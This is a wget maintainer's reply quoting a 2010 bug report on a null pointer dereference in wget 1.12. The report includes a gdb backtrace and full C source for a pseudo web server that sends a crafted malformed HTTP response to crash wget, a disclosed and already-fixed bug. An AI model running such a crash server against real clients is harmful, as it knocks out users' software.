Thanks for your report. This bug is already fixed in the source repository.
Cheers, Giuseppe Ildar Isaev <[email protected]> writes: > Hi, i downloaded wget-1.12 from ftp://ftp.gnu.org/gnu/wget/wget-1.12.tar.bz2 > > It turns out it has a null pointer dereference bug. This is how it may > be reproduced. > > Expl_for_wget.c (attached) is a small pseudo web server. Compile it and run: > > u...@machine:$ gcc -Wall expl_for_wget.c -o expl_for_wget > u...@machine:$ ./expl_for_wget & > [1] 7330 > u...@machine:$ gdb --args <path_to_wget_install_dir>/bin/wget > http://127.0.0.1:3500/ > GNU gdb 6.8-debian > Copyright (C) 2008 Free Software Foundation, Inc. > License GPLv3+: GNU GPL version 3 or later > <http://gnu.org/licenses/gpl.html> > This is free software: you are free to change and redistribute it. > There is NO WARRANTY, to the extent permitted by law. Type "show copying" > and "show warranty" for details. > This GDB was configured as "i486-linux-gnu"... > (gdb) run > [Thread debugging using libthread_db enabled] > --2010-05-14 22:39:36-- http://127.0.0.1:3500/ > Connecting to 127.0.0.1:3500... connected. > HTTP request sent, awaiting response... [New Thread 0x403a26c0 (LWP 7332)] > > Program received signal SIGSEGV, Segmentation fault. > [Switching to Thread 0x403a26c0 (LWP 7332)] > 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6 > (gdb) bt > #0 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6 > #1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117 > #2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24, > proxy=0x0, iri=0x8a27d40) at http.c:1832 > #3 0x08066151 in http_loop (u=0x8a280e8, newloc=0xbffa8dec, > local_file=0xbffa8dd8, referer=0x0, dt=0xbffa8f24, proxy=0x0, > iri=0x8a27d40) at http.c:2581 > #4 0x08072798 in retrieve_url (orig_parsed=0x8a280e8, > origurl=0x8a27dd8 "http://127.0.0.1:3500/";, file=0xbffa8f2c, > newloc=0xbffa8f28, refurl=0x0, dt=0xbffa8f24, recursive=false, > iri=0x8a27d40, register_status=true) at retr.c:692 > #5 0x0806c46e in main (argc=2, argv=0xbffa9014) at main.c:1294 > (gdb) up > #1 0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117 > 117 return xmemdup (string, strlen (string) + 1); > (gdb) > #2 0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24, > proxy=0x0, iri=0x8a27d40) at http.c:1832 > 1832 hs->message = xstrdup (message); > (gdb) list > 1827 resp = resp_new (head); > 1828 1829 /* Check for status line. */ > 1830 message = NULL; > 1831 statcode = resp_status (resp, &message); > 1832 hs->message = xstrdup (message); > 1833 if (!opt.server_response) > 1834 logprintf (LOG_VERBOSE, "%2d %s\n", statcode, > 1835 message ? quotearg_style (escape_quoting_style, > message) : ""); > 1836 else > (gdb) p message > $1 = 0x0 > > One can see that null pointer dereference occurs at http.c:1832 as > message' is equal to null. > > Best regards, > Ildar > > /* Server code in C */ > //exploit_13 > > #include <sys/types.h> > #include <sys/socket.h> > #include <netinet/in.h> > #include <arpa/inet.h> > #include <stdio.h> > #include <stdlib.h> > #include <string.h> > #include <unistd.h> > > int main(void) > { > struct sockaddr_in stSockAddr; > int sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); > > if(sfd == -1) > { > perror("can not create socket"); > exit(EXIT_FAILURE); > } > > memset(&stSockAddr, 0, sizeof(struct sockaddr_in)); > > stSockAddr.sin_family = AF_INET; > stSockAddr.sin_port = htons(3500); > inet_pton(AF_INET, "127.0.0.1", &stSockAddr.sin_addr); > > int bindRes = bind(sfd, (const struct sockaddr*)&stSockAddr, sizeof(struct > sockaddr_in)); > > if(bindRes == -1) > { > perror("error bind failed"); > close(sfd); > exit(EXIT_FAILURE); > } > > int listenRes = listen(sfd, 10); > > if(listenRes == -1) > { > perror("error listen failed"); > close(sfd); > exit(EXIT_FAILURE); > } > > int cfd = accept(sfd, NULL, NULL); > > char buf[227] = > {0x48,0x54,0x54,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0A,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00}; > > write(cfd, buf, 227); > close(cfd); > > return 0; > }
